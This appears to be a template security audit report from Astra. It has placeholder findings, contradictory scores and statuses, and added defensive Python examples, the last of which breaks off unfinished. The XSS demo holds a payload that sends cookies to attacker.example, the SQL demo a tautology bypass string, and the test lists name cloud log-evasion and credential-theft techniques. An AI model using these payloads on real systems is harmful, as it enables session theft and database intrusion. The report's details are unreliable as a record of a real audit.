SECURITY AUDIT
REPORT FOR
www.getastra.com
Confidential
MY BUSINESS
ATTENTION: This document contains information from Astra IT, Inc. & Czar Securities Pvt. Ltd. that is confidential and privileged. The information is
intended for private use of the client. By accepting this document you agree to keep the contents in confidence and not copy, disclose, or distribute
this without written request to and written confirmation from Astra IT, Inc. & Czar Securities Pvt. Ltd. If you are not the intended recipient, be aware
that any disclosure, copying, or distribution of the contents of this document is prohibited.
April 05, 2021
COPYRIGHT © ASTRA IT, INC. All rights reserved.
hello@getastra.com
Document Details
Confidential
Title Details
COMPLETED ON: APRIL 02, 2021
REPORT TYPE: MANUAL SCAN
VALIDITY: 30 DAYS
Table of Contents
1. Executive Summary
1.1 Scope of Testing
1.2 Graphical Summary
1.3 List of Vulnerabilities
2. Discovered Vulnerabilities Details
3. List of Tests Performed
3.1 OWASP Top 10
3.2 SANS 25 Software Errors/Tests
3.3 Other Test Cases
3.4 Server-Level Test Cases
3.5 Test Cases for Windows
3.6 Test Cases for Android / iOS
3.7 Test Cases for Cloud (AWS, Azure, GCP, and Other)
3.8 Test Cases for Blockchain
Confidential 2
1. Executive Summary
This document contains the initial security assessment report for:
{Goldcast Web application and its backend dashboards.}
The purpose of this assessment was to point out security loopholes, business logic
errors, and missing security best practices. The tests were carried out from the
perspective of an attacker or a malicious user, but no harm was done to the functionality
or working of the application/network.
The security assessment covers testing for security loopholes in the scope defined
below. Apart from the following, no other information was provided, and nothing was
assumed at the start of the security assessment.
The following was the scope covered under the security audit:
1.1 Scope of Testing
Application 1: {URL1}
Application 2: {URL2}
1.2 Graphical Summary
The graphical representations below, taken from Astra's VAPT dashboard, give an overall
summary of the security audit results: the vulnerabilities discovered, their severity and
CVSS score, and per-vulnerability details such as impact, detailed PoC, steps to
reproduce, affected URLs/network parameters, and recommended fixes.
Graph 1: Issues Type    Graph 2: Severity Type
Vulnerability Severity    No. of Vulnerabilities found
Critical                  0
High                      1
Medium                    2
Low                       4
Recommendations           0

1.3 List of Vulnerabilities

#   Vulnerability                          Severity   Status   CVSS Score
1   Voluptas voluptates ipsa eos natus.    Low        Closed   6
2   Voluptas voluptates ipsa eos natus.    Medium     Closed   7
3   Voluptas voluptates ipsa eos natus.    Low        Closed   5
4   Voluptas voluptates ipsa eos natus.    High       Closed   9
5   Voluptas voluptates ipsa eos natus.    Low        Closed   6
6   Voluptas voluptates ipsa eos natus.    Medium     Closed   7
7   Voluptas voluptates ipsa eos natus.    Low        Closed   5
2. Discovered Vulnerabilities Details

Vulnerability #1: Missing API Security Headers
CVSS Score: 5.4
Status: Unsolved
Severity: Medium

Details of Vulnerability:
We were able to detect that the following security headers are missing from the API responses:
1. Content-Security-Policy
2. Strict-Transport-Security
3. X-Content-Type-Options

A Content Security Policy (CSP) is a W3C standard aimed at mitigating a broad range of
content injection attacks such as cross-site scripting (XSS) and data injection. It is a
declarative policy, sent as a response header, that tells the user agent which sources are
valid for loading scripts, styles, frames and other resources; a policy that restricts
resource loads to HTTPS also reduces the exposure of embedded resources to traffic
interception.

Impact:
A missing X-Content-Type-Options header means browsers may MIME-sniff a response and
interpret it as a content type other than the one declared, which exposes the site to
MIME-sniffing attacks (for example, an uploaded file or API response being treated as
HTML or script).
A missing Strict-Transport-Security header means the application fails to prevent users
from connecting to it over unencrypted connections. An attacker able to modify a
legitimate user's network traffic could bypass the application's use of SSL/TLS
encryption and use the application as a platform for attacks against its users.

Additional References:
https://www.example.com/reference
https://test.com/reference

Suggested Fixes:
Send all three headers on every response, including API and error responses: a
Content-Security-Policy tailored to the application's resource origins,
Strict-Transport-Security with a max-age of at least one year (and includeSubDomains
where every subdomain is served over HTTPS), and X-Content-Type-Options: nosniff.

Affected URL: Sitewide
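As an added example (not code from this report or from Astra's scanner), the following Python script checks a captured set of response headers for the three findings above and sanity-checks their values rather than only testing for presence. The two header sets are constructed for the demonstration, and the thresholds (an HSTS max-age of at least one year, no 'unsafe-inline' or wildcard in the CSP script source) are this example's own assumptions, not values taken from the report.

```python
"""Check one response's headers for the three headers reported missing in Vulnerability #1.

Added example for this report, not Astra's scanner code. WEAK_HEADERS and HARDENED_HEADERS
are constructed samples; ONE_YEAR and the CSP rules are assumed thresholds."""

import re

ONE_YEAR = 31536000  # seconds; assumed minimum HSTS max-age

# Constructed sample: an API response that would trigger this finding.
WEAK_HEADERS = {
    "Content-Type": "application/json",
    "Server": "nginx",
}

# Constructed sample: the same response after the fix.
HARDENED_HEADERS = {
    "Content-Type": "application/json",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
}


def get_header(headers, name):
    """Case-insensitive lookup, since HTTP header names are case-insensitive."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def parse_csp(value):
    """Split "a b; c d" into {"a": ["b"], "c": ["d"]}; directive names are case-insensitive."""
    directives = {}
    for part in value.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def check_csp(value):
    if value is None:
        return ["Content-Security-Policy header missing"]
    findings = []
    directives = parse_csp(value)
    # script-src falls back to default-src when it is not set explicitly
    script_src = directives.get("script-src", directives.get("default-src"))
    if script_src is None:
        findings.append("CSP sets neither script-src nor default-src")
    else:
        if "'unsafe-inline'" in script_src:
            findings.append("CSP allows 'unsafe-inline' in script-src")
        if "*" in script_src:
            findings.append("CSP allows scripts from any origin (*)")
    return findings


def check_hsts(value):
    if value is None:
        return ["Strict-Transport-Security header missing"]
    findings = []
    match = re.search(r"max-age\s*=\s*\"?(\d+)", value, re.IGNORECASE)
    if match is None:
        findings.append("HSTS max-age directive missing")
    elif int(match.group(1)) < ONE_YEAR:
        findings.append(f"HSTS max-age {match.group(1)} is below {ONE_YEAR}")
    if "includesubdomains" not in value.lower():
        findings.append("HSTS does not set includeSubDomains")
    return findings


def check_nosniff(value):
    if value is None:
        return ["X-Content-Type-Options header missing"]
    if value.strip().lower() != "nosniff":
        return [f"X-Content-Type-Options has unexpected value {value!r}"]
    return []


def audit_headers(headers):
    """Return every finding for one response's headers; an empty list means all checks pass."""
    return (
        check_csp(get_header(headers, "Content-Security-Policy"))
        + check_hsts(get_header(headers, "Strict-Transport-Security"))
        + check_nosniff(get_header(headers, "X-Content-Type-Options"))
    )


if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_headers(hdrs) or "OK")
```

Run the audit against the headers of a real response (for example the dictionary returned by an HTTP client) once per endpoint class, because API, static and error responses are often served by different layers and one of them is usually the one that forgets the headers.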
Vulnerability #2: Stored Cross-Site Scripting (XSS)
CVSS Score: 7.7
Status: Resolved
Severity: High

Details of Vulnerability:
A stored XSS vulnerability was found on the affected URLs. It allows an attacker to inject
a script that is stored by the application. When a victim navigates to the affected web
page in a browser, the XSS payload is served as part of the web page, so victims
inadvertently execute the malicious script, in the security context of the application's
origin, as soon as the page is viewed.

Impact:
The attacker-supplied code can perform a wide variety of actions, such as:
1. Stealing the victim's session token
2. Stealing login credentials
3. Stealing customer credit card information

Additional References:
https://www.example.com/reference
https://test.com/reference

Suggested Fixes:
To prevent stored XSS, treat stored user input as untrusted at the point of output: apply
context-aware output encoding (HTML body, attribute, JavaScript and URL contexts)
whenever stored data is written into a page, preferably through a templating engine that
escapes by default. Validate and normalise input on the server side before it is stored as
a second layer of defence; client-side validation alone can be bypassed by sending requests
directly to the server. A restrictive Content-Security-Policy further limits what an injected
script can do if a payload slips through.
Suggested Fix 2

Affected URL:
http://example.com/test1n
https://example.com/test2
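As an added example (not the audited application's code), the following Python shows the vulnerable rendering pattern beside its hardened form for two output contexts: the HTML body of a comment and the href attribute of a profile link. The payload and the profile data are constructed; the point is that encoding happens at render time, for the context the data lands in, regardless of what was validated before storage.

```python
"""Stored-XSS rendering, vulnerable and hardened side by side.

Added example, not the audited application's code. PAYLOAD and the names and URLs used
below are constructed for the demonstration."""

import html
from urllib.parse import urlsplit

# Constructed payload of the kind a stored-XSS probe submits through a comment form.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(author, body):
    """Vulnerable: stored strings are concatenated straight into the HTML body."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """Hardened: HTML-encode in the element-body context (html.escape encodes & < > " ')."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def safe_link_url(url):
    """Accept only absolute http(s) URLs for href values; javascript:, data: and
    scheme-relative URLs are rejected. Returns None when the URL is not acceptable."""
    candidate = url.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return candidate


def render_profile_link_safe(display_name, website):
    """Attribute context: the href is scheme-checked and attribute-encoded, and the
    visible text is body-encoded. A rejected URL drops the link rather than emit it."""
    url = safe_link_url(website)
    if url is None:
        return html.escape(display_name)
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(display_name)}</a>'


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))   # script tag reaches the browser
    print(render_comment_safe("mallory", PAYLOAD))         # rendered as inert text
    print(render_profile_link_safe("mallory", "javascript:alert(1)"))
```

The same stored record must be encoded differently when it is emitted into JSON, a JavaScript string or an e-mail body, which is why escaping at storage time is not a substitute for output encoding.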
Vulnerability #3: SQL Injection
CVSS Score: 5
Status: Resolved
Severity: Medium

Details of Vulnerability:
SQL injection vulnerabilities arise when user-controllable data is incorporated into
database SQL queries in an unsafe manner. An attacker can supply crafted input to break
out of the data context in which their input appears and interfere with the structure of the
surrounding query.

Steps to reproduce:
The JSON parameter appears to be vulnerable to SQL injection attacks. A single quote was
submitted in the JSON parameter, and a general error message was returned. Two single
quotes were then submitted and the error message disappeared. You should review the
contents of the error message, and the application's handling of other input, to confirm
whether a vulnerability is present.
HTTP Requests: /CRUX/UIDL/

Additional References:
https://www.example.com/reference
https://test.com/reference

Suggested Fixes:
The most effective way to prevent SQL injection attacks is to use parameterized
queries (also known as prepared statements) for all database access. This method uses
two steps to incorporate potentially tainted data into SQL queries: first, the application
specifies the structure of the query, leaving placeholders for each item of user input;
second, the application specifies the contents of each placeholder. Because the
structure of the query has already been defined in the first step, it is not possible for
malformed data in the second step to interfere with the query structure. You should
review the documentation for your database and application platform to determine
the appropriate APIs which you can use to perform parameterized queries. Note that
parameterization covers values only: table and column names or ORDER BY directions
cannot be bound and must be validated against an allow-list.
Suggested Fix 2

Affected URL: https://www.example.co/form7
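As an added example (not the audited application's code), the following Python reproduces the single-quote / two-single-quote probe from the steps above against a vulnerable lookup and against the parameterized fix, using an in-memory SQLite table constructed for the demonstration. The lookup functions stand in for the application's query on the JSON parameter, which the report does not show.

```python
"""SQL injection: the probe described in "Steps to reproduce" and the parameterized fix.

Added example, not the audited application's code. The users table is constructed for the
demonstration; lookup_vulnerable/lookup_safe are assumed stand-ins for the real query."""

import sqlite3


def make_db():
    """Constructed sample data: two users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def lookup_vulnerable(conn, name):
    """Vulnerable: the value is spliced into the SQL text, so quotes change the grammar."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Fixed: the query structure is fixed first, the value is bound afterwards."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


def quote_probe(lookup, conn, base="alice"):
    """The heuristic from the report: a lone single quote should raise a database error,
    while two single quotes (an escaped quote inside the literal) should not.
    Returns (error_on_one_quote, error_on_two_quotes)."""
    outcome = []
    for probe in (base + "'", base + "''"):
        try:
            lookup(conn, probe)
            outcome.append(False)
        except sqlite3.Error:  # syntax error from the broken string literal
            outcome.append(True)
    return tuple(outcome)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", quote_probe(lookup_vulnerable, db))  # (True, False)
    print("safe:      ", quote_probe(lookup_safe, db))        # (False, False)
    print("bypass:    ", lookup_vulnerable(db, "x' OR '1'='1"))  # both rows
    print("bound:     ", lookup_safe(db, "x' OR '1'='1"))        # no rows
```

The (True, False) signature is exactly what the scanner observed: the error appears with one quote and disappears with two because the second quote repairs the string literal. With the bound parameter the probe string never touches the grammar, so neither variant errors and the tautology payload matches nothing.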
Vulnerability #4: Incorrect Constructor Name
CVSS Score: 6.3
Status: Unsolved
Severity: Medium

Details of Vulnerability:
Constructors are special functions that are called only once, during contract creation.
They often perform critical, privileged actions such as setting the owner of the contract.
Before Solidity version 0.4.22, the only way of defining a constructor was to create a
function with the same name as the contract containing it. A function meant to be the
constructor becomes a normal, publicly callable function if its name does not exactly
match the contract name (the comparison is case-sensitive). This leads to security issues,
in particular when smart contract code is re-used under a different name but the name of
the constructor function is not changed accordingly: anyone can then call the would-be
constructor after deployment and, for example, take ownership of the contract.

Steps to reproduce:

Additional References:
https://swcregistry.io/docs/SWC-118

Suggested Fixes:
Solidity version 0.4.22 introduced the constructor keyword, which makes constructor
definitions unambiguous. It is therefore recommended to upgrade the contract to a recent
version of the Solidity compiler and to declare the constructor with the constructor
keyword. From version 0.5.0 onwards the old name-based form is no longer accepted, so the
compiler itself rejects this class of bug.

Affected URL: https://www.hacked.co
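As an added example (not Astra's tooling), the following Python script is a small static check for this finding: it scans pre-0.5.0 Solidity source and flags functions that look like a constructor whose name no longer matches the contract. The contract source is constructed for the demonstration, and the heuristic is this example's assumption: in a file that still uses name-based constructors, flag any function whose name matches its contract's name only case-insensitively, or matches the name of another contract in the same file (the copy-and-rename mistake described above).

```python
"""Static check for SWC-118 (incorrect constructor name) in pre-0.5.0 Solidity source.

Added example for this report, not Astra's tooling. SAMPLE is constructed; the matching
rules in find_misnamed_constructors are an assumed heuristic, not the compiler's logic."""

import re

PRAGMA_RE = re.compile(r"pragma\s+solidity\s*[\^>=<~]*\s*(\d+)\.(\d+)\.(\d+)")
CONTRACT_RE = re.compile(r"\bcontract\s+(\w+)[^{]*\{")
FUNCTION_RE = re.compile(r"\bfunction\s+(\w+)\s*\(")

SAMPLE = """
pragma solidity ^0.4.19;

contract Owned {
    address public owner;
    function Owned() public { owner = msg.sender; }   // correct pre-0.4.22 constructor
    modifier onlyOwner() { require(msg.sender == owner); _; }
}

contract Wallet is Owned {
    // Meant to be the constructor, but the case differs: deployed as a public function.
    function wallet() public { owner = msg.sender; }
    function withdraw() public onlyOwner { msg.sender.transfer(address(this).balance); }
}

contract Vault {
    // Copied from Wallet and renamed; the constructor name was left unchanged.
    function Wallet() public { }
}
"""


def pragma_version(source):
    """Lowest compiler version the pragma admits, or None if there is no pragma."""
    match = PRAGMA_RE.search(source)
    return tuple(int(g) for g in match.groups()) if match else None


def contract_bodies(source):
    """Yield (contract name, body text) pairs, matching braces to find each body."""
    for match in CONTRACT_RE.finditer(source):
        depth, pos = 1, match.end()
        while pos < len(source) and depth:
            depth += {"{": 1, "}": -1}.get(source[pos], 0)
            pos += 1
        yield match.group(1), source[match.end():pos - 1]


def find_misnamed_constructors(source):
    """Return (contract, function, reason) for every suspect function."""
    version = pragma_version(source)
    if version is not None and version >= (0, 5, 0):
        return []  # name-based constructors are rejected by the compiler from 0.5.0
    contracts = list(contract_bodies(source))
    names = {name for name, _ in contracts}
    findings = []
    for name, body in contracts:
        for fn in FUNCTION_RE.findall(body):
            if fn == name:
                continue  # exact match: a valid pre-0.4.22 constructor
            if fn.lower() == name.lower():
                findings.append((name, fn, "case differs from contract name"))
            elif fn in names:
                findings.append((name, fn, "named after another contract in this file"))
    return findings


if __name__ == "__main__":
    for contract, fn, reason in find_misnamed_constructors(SAMPLE):
        print(f"{contract}.{fn}(): {reason}")
```

In the sample, Wallet.wallet() and Vault.Wallet() are both deployed as ordinary public functions, and the first one hands ownership to whoever calls it; the same source under pragma ^0.5.0 produces no findings because the compiler no longer accepts name-based constructors at all.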
3. List of VAPT Tests Performed
The following lists of tests are indicative and not limited to the ones listed. Most importantly,
every test case has multiple sub-test cases, ranging from a few to sometimes 1000+ sub-tests.
Additional test cases will be performed based on factors such as:
1. Technology stack
2. Server-side programming language, front-end frameworks
3. Framework/CMS/APIs
4. Type of application (payment integrations, external integrations)

3.1 OWASP Top 10

OWASP Top 10 for Web Applications
1. SQL Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging and Monitoring

OWASP Top 10 for Mobile Applications
1. Improper Platform Usage
2. Insecure Data Storage
3. Insecure Communication
4. Insecure Authentication
5. Insufficient Cryptography
6. Insecure Authorization
7. Client Code Quality
8. Code Tampering
9. Reverse Engineering
10. Extraneous Functionality
3.2 SANS 25 Software Errors/Tests
1. Improper Restriction of Operations within the Bounds of a Memory Buffer
2. Improper Neutralization of Input During Web Page Generation ('XSS')
3. Improper Input Validation
4. Information Exposure
5. Out-of-bounds Read
6. Improper Neutralization of Special Elements used in an SQL Command (SQLi)
7. Use After Free
8. Integer Overflow or Wraparound
9. Cross-Site Request Forgery (CSRF)
10. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
11. Improper Neutralization of Special Elements used in an OS Command
12. Out-of-bounds Write
13. Improper Authentication
14. NULL Pointer Dereference
15. Incorrect Permission Assignment for Critical Resource
16. Unrestricted Upload of File with Dangerous Type
17. Improper Restriction of XML External Entity Reference
18. Improper Control of Generation of Code ('Code Injection')
19. Uncontrolled Resource Consumption
20. Missing Release of Resource after Effective Lifetime
21. Untrusted Search Path
22. Deserialization of Untrusted Data
23. Improper Certificate Validation
24. Use of Hard-coded Credentials
25. Improper Privilege Management
3.3 Other Test Cases

#    Other Test performed                                Typical Severity
1    OS Command Injection                                High
2    SQL Injection (Second Order)                        High
3    XML External Entity Injection                       High
4    LDAP Injection                                      High
5    XPath Injection                                     High
6    XML Injection                                       High
7    ASP.NET Debugging Enabled                           High
8    DoS: Locking Customer Accounts                      High
9    DoS: Buffer Overflows                               Medium
10   Storing too much data in session (DoS)              Medium
11   Writing user-provided data to disk (DoS)            High
12   HTTP insecure methods available on server           High
13   Out-of-band resource load (HTTP)                    High
14   File path manipulation                              High
15   Server-side JavaScript code injection               High
16   Perl code injection                                 High
17   Ruby code injection                                 High
18   Python code injection                               High
19   Expression Language injection                       High
20   Unidentified code injection                         High
21   Client-side SQLi (Stored DOM-based)                 High
22   Server-side template injection                      High
23   SSL injection                                       High
24   Stored XSS                                          High
25   HTTP response header injection                      High
26   Reflected XSS                                       High
27   Client-side template injection                      High
28   DOM-based XSS                                       High
29   Reflected DOM-based XSS                             High
30   Stored DOM-based XSS                                High
31   DOM-based JavaScript injection                      High
32   Reflected DOM-based JavaScript injection            High
33   Stored DOM-based JavaScript injection               High
34   Path-relative style sheet import                    Information
35   Client-side SQLi (DOM-based)                        High
36   Client-side SQLi (Reflected DOM-based)              High
37   Duplicate cookies set                               Information
38   WebSocket hijacking (DOM-based)                     High
39   WebSocket hijacking (Reflected DOM-based)           High
40   WebSocket hijacking (Stored DOM-based)              High
41   Local path manipulation (DOM-based)                 High
42   Local path manipulation (Reflected DOM-based)       High
43   Local path manipulation (Stored DOM-based)          High
44   Client-side XPath injection (DOM-based)             Low
45   Client-side XPath injection (Reflected DOM-based)   Low
46   Client-side XPath injection (Stored DOM-based)      Low
47   Client-side JSON injection (DOM-based)              Low
48   Client-side JSON injection (Reflected DOM-based)    Low
49   Client-side JSON injection (Stored DOM-based)       Low
50   Flash cross-domain policy                           High
51   Cross-origin resource sharing                       Information
52   Cross-origin resource sharing (arbitrary)           High
53   Cross-origin resource sharing (encrypted)           Low
54   Cross-origin resource sharing (all sub-domains)     Low
55   Cross-Site Request Forgery (CSRF)                   Medium
56   SMTP header injection                               Medium
57   Cleartext submission of password                    High
58   External service interaction (DNS)                  High
59   External service interaction (HTTP)                 High
60   External service interaction (SMTP)                 Information
61   Referrer dependent response                         Information
62   Spoofable client IP address                         Information
63   User-agent dependent response                       Information
64   Password returned in a later response               Medium
65   Password submitted using GET method                 Low
66   Password returned in URL query string               Low
67   SQL statement in request parameter                  Medium
68   Cross-domain POST                                   Information
69   ASP.NET ViewState without MAC enabled               Low
70   XML entity expansion                                Medium
71   Long redirection response                           Information
72   Serialized object in HTTP message                   High
#    Other Test performed                                Typical Severity
109  Link manipulation (DOM-based)                       Low
110  Input returned in response (stored)                 Information
111  Input returned in response (reflected)              Information
112  Suspicious input transformation (reflected)         Information
113  Suspicious input transformation (stored)            Information
114  Open redirection (stored)                           Low
115  Open redirection (reflected)                        Medium
116  Open redirection (DOM-based)                        Low
117  Open redirection (Stored DOM-based)                 Low
118  Open redirection (Reflected DOM-based)              Medium
119  SSL cookie without secure flag set                  Medium
120  Cookie scoped to parent domain                      Low
121  Cross-domain referrer leakage                       Information
122  Cross-domain script include                         Information
123  Cookie without HttpOnly flag set                    Low
124  Session token in URL                                Medium
125  Password field with autocomplete enabled            Low
126  Password value set in cookie                        Medium
127  Browser cross-site scripting filter disabled        Information
128  HTTP TRACE method is enabled                        Information
129  Cookie manipulation (DOM-based)                     Low
130  Cookie manipulation (Reflected DOM-based)           Low
131  Cookie manipulation (Stored DOM-based)              Low
132  Ajax request header manipulation (DOM-based)        Low
133  Ajax request header manipulation (Reflected DOM)    Low
134  Ajax request header manipulation (Stored DOM)       Low
135  Denial of service (DOM-based)                       Information
136  Denial of service (Reflected DOM-based)             Information
137  Denial of service (Stored DOM-based)                Low
138  HTML5 web message manipulation (DOM-based)          Information
139  HTML5 web message manipulation (Reflected DOM)      Information
140  HTML5 web message manipulation (Stored DOM)         Information
141  HTML5 storage manipulation (DOM-based)              Information
142  HTML5 storage manipulation (Reflected DOM)          Information
143  HTML5 storage manipulation (Stored DOM)             Information
#    Other Test performed                                Typical Severity
144  Mixed content                                       Information
145  Link manipulation (Reflected DOM-based)             Low
146  Link manipulation (Stored DOM-based)                Low
147  Link manipulation (reflected & stored)              Information
148  Document domain manipulation (DOM-based)            Medium
149  Document domain manipulation (Reflected DOM)        Medium
150  Document domain manipulation (Stored DOM)           Medium
151  DOM data manipulation (DOM-based)                   Information
152  CSS injection (reflected & stored)                  Medium
153  Client-side HTTP parameter pollution (reflected)    Low
154  Client-side HTTP parameter pollution (stored)       Low
155  Form action hijacking (reflected)                   Medium
156  Form action hijacking (stored)                      Medium
157  Database connection string disclosed                Medium
158  Source code disclosure                              Low
159  Directory listing                                   Information
160  Email addresses disclosed                           Information
161  Private IP addresses disclosed                      Information
162  Social security numbers disclosed                   Information
163  Credit card numbers disclosed                       Information
164  Private key disclosed                               Information
165  Cacheable HTTPS response                            Information
166  Base64-encoded data in parameter                    Information
167  Multiple content types specified                    Information
168  HTML does not specify charset                       Information
169  HTML uses unrecognized charset                      Information
170  Content type incorrectly stated                     Low
171  Content type is not specified                       Information
172  SSL certificate                                     Medium
173  Unencrypted communications                          Low
174  Strict transport security not enforced              Low
3.4 Server-Level Test Cases

Information Gathering
1. Test RIA cross-domain policy
2. Fingerprint web server
3. Test network/infrastructure configuration
4. Test HTTP methods
5. Test HTTP Strict Transport Security (HSTS)
6. Testing for cookie attributes

SSL/TLS Testing
7. Insufficient public key length
8. Heartbleed
9. POODLE SSL vulnerability
10. ChangeCipherSpec injection
11. BREACH
12. BEAST
13. Forward secrecy support
14. RC4 support
15. CRIME & TIME vulnerabilities
16. Lucky13
17. HSTS: check for header
18. HSTS: reasonable duration of max-age
19. HSTS: check for includeSubDomains support
20. Certificate expiration
21. Host name mismatch
22. Weak/insecure hashing algorithm
23. SSLv2 support
24. Weak ciphers check (Low, Anon, Null, Export)
25. Null prefix in the certificate
26. HTTPS stripping
27. SurfJacking
28. Non-SSL elements/content embedded in SSL page
29. Cache control

Configuration and Deployment Management Testing
30. Test RIA cross-domain policy
31. Test network/infrastructure configuration
32.  Test HTTP methods
33. Test HTTP Strict Transport Security
34. Testing for cookie attributes

Cryptography
35. Test HTTP Strict Transport Security
36. Testing for weak SSL/TLS ciphers and insufficient transport layer protection
37. Test HTTP methods
3.5 Test Cases for Windows

3.6 Test Cases for Android and iOS
Test Cases for Android
Test Cases for iOS
3.7 Test Cases for Cloud (AWS, Azure, GCP, and Other)
1. Test for credential stealing attack on operation of a cloud key management service
2. Test for unauthenticated database access
3. Test for improper permissions for database
4. Test for compromising access keys
5. Test for extracting keys from a VM / instance
6. Test for exploits due to improper configs
7. Testing for public exploits in VM / instances
8. Test for backdoor exploitation internally
9. Test for subdomain takeover
10. Test for access management privilege escalation
11. Test for Remote Code Execution (RCE)
12. Test for role enumeration
13. Test for VM service privilege escalation
14. Test for IAM enumeration
15. Test for Bitbucket Server data for credentials
16. Test for cloud compromise by DNS rebinding
17. Test for local Windows/Linux log changes
18. Test for loopholes that add root certificates and SSH private keys to VMs and users
19. Test for loopholes that assign a secondary private IP address to an instance / VM when the instance / VM is launched
20. Test for unauthenticated retrieval of VM images from storage accounts, and analysis of them for passwords, keys and certificates that give access to live resources
21. Test for penetrating OS-level access to instances/VMs via workload
22. Test for management service privileges
23. Test to run or deploy a workload with an assigned service or role and export instance credentials for those privileges
24. Test for server and application version & framework fingerprinting, and detect exposed sensitive PII in server/application logs
25. Test for CSV injection
26. Test for MITM attack penetration on Elastic Load Balancer (ELB) for session hijacking
27. Test for credential stealing attack on credentials
28. Test for credential stealing attack on cloud workload
29. Test to alter data in a datastore for fraudulent transactions or static website compromise
30. Test to alter a serverless function, logic app or other business logic implementation for action on objective or escalation
31. Test to alter a DNS resource record set in a trusted zone and/or the certificates for that record set to divert traffic, create phishing sites and abuse the brand (AWS ACM, AWS Route 53, Azure DNS Service)
32. Test to alter data in local SQL or MySQL databases
33. Operate in regions where logging is not enabled, or disable global logging (like CloudTrail)
34. Test to alter log files in a non-validated log store or disable validation (like CloudTrail log file validation)
35. Test for disabling network traffic analysis/logging (VPC Flow Logs)
36. Test for disabling cloud alerting to prevent detection and response
37. Test for disabling data store access logging to prevent detection and response (CloudTrail data events, S3 access logging, etc.)
38. Test to alter log retention or damage the integrity of logs (S3 lifecycle, KMS decryption, CMK key deletion/role privilege lockout)
39. Process hooking, process injection, Windows access token manipulation, leveraging misconfigured sudo capabilities
40. Test to create or reset a login, access key, or temporary credential belonging to a high-privilege user (like iam:CreateAccessKey, STS, or iam:UpdateLoginProfile)
41. Test to change the default policy version for a user or new users to include additional privileges (like iam:SetDefaultPolicyVersion)
42. Leverage data or code pipelines to execute operations on behalf of their assumed roles (AWS Data Pipeline ShellCommandActivity, injecting Python code into a pickle-serialized Celery SQS queue)
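As an added example (not Astra's detection content), the following Python triages CloudTrail-shaped records for the defence-evasion and credential test cases in items 33 to 41 above: disabled or deleted trails, log file validation turned off, flow logs and alarms removed, and access keys or policy versions minted for a different IAM user. The records are constructed with only the fields the check reads; the event-name table, the allowed-region list and the rule that self-service key rotation is benign are this example's own assumptions.

```python
"""Triage CloudTrail records for the logging-evasion and credential test cases above.

Added example, not Astra's detection content. SAMPLE_LOG is constructed; ALLOWED_REGIONS,
SUSPICIOUS_EVENTS and the self-rotation exception are assumptions for the demonstration."""

import json

# Regions where the account is expected to operate and where trails are enabled (assumed).
ALLOWED_REGIONS = {"us-east-1", "eu-west-1"}

# CloudTrail eventName -> the test case it evidences (UpdateTrail, CreateAccessKey and
# UpdateLoginProfile need a look at the request parameters and are handled separately).
SUSPICIOUS_EVENTS = {
    "StopLogging": "global logging disabled (CloudTrail)",
    "DeleteTrail": "global logging disabled (CloudTrail)",
    "PutEventSelectors": "data-store access logging changed (CloudTrail data events)",
    "DeleteFlowLogs": "network traffic logging disabled (VPC Flow Logs)",
    "DisableAlarmActions": "cloud alerting disabled",
    "ScheduleKeyDeletion": "log integrity at risk (CMK scheduled for deletion)",
    "PutBucketLifecycle": "log retention altered (S3 lifecycle)",
    "SetDefaultPolicyVersion": "default policy version changed (privilege escalation)",
}

# Constructed records, one JSON object per line, with only the fields this check reads.
SAMPLE_LOG = """
{"eventName": "StopLogging", "awsRegion": "us-east-1", "userIdentity": {"userName": "dev-ci"}, "requestParameters": {"name": "org-trail"}}
{"eventName": "UpdateTrail", "awsRegion": "us-east-1", "userIdentity": {"userName": "dev-ci"}, "requestParameters": {"name": "org-trail", "enableLogFileValidation": false}}
{"eventName": "UpdateTrail", "awsRegion": "us-east-1", "userIdentity": {"userName": "sec-admin"}, "requestParameters": {"name": "org-trail", "enableLogFileValidation": true}}
{"eventName": "CreateAccessKey", "awsRegion": "eu-west-1", "userIdentity": {"userName": "alice"}, "requestParameters": {"userName": "alice"}}
{"eventName": "CreateAccessKey", "awsRegion": "eu-west-1", "userIdentity": {"userName": "alice"}, "requestParameters": {"userName": "break-glass-admin"}}
{"eventName": "DeleteFlowLogs", "awsRegion": "eu-west-1", "userIdentity": {"userName": "dev-ci"}, "requestParameters": {"flowLogIds": ["fl-0abc"]}}
{"eventName": "RunInstances", "awsRegion": "ap-southeast-2", "userIdentity": {"userName": "dev-ci"}, "requestParameters": {}}
"""


def parse_records(text):
    """Parse one JSON record per line (a CloudTrail export with its Records array split)."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def actor(event):
    identity = event.get("userIdentity") or {}
    return identity.get("userName") or identity.get("arn") or identity.get("type", "unknown")


def classify(event):
    """Return the reason an event is suspicious, or None if it matches no test case."""
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    region = event.get("awsRegion")
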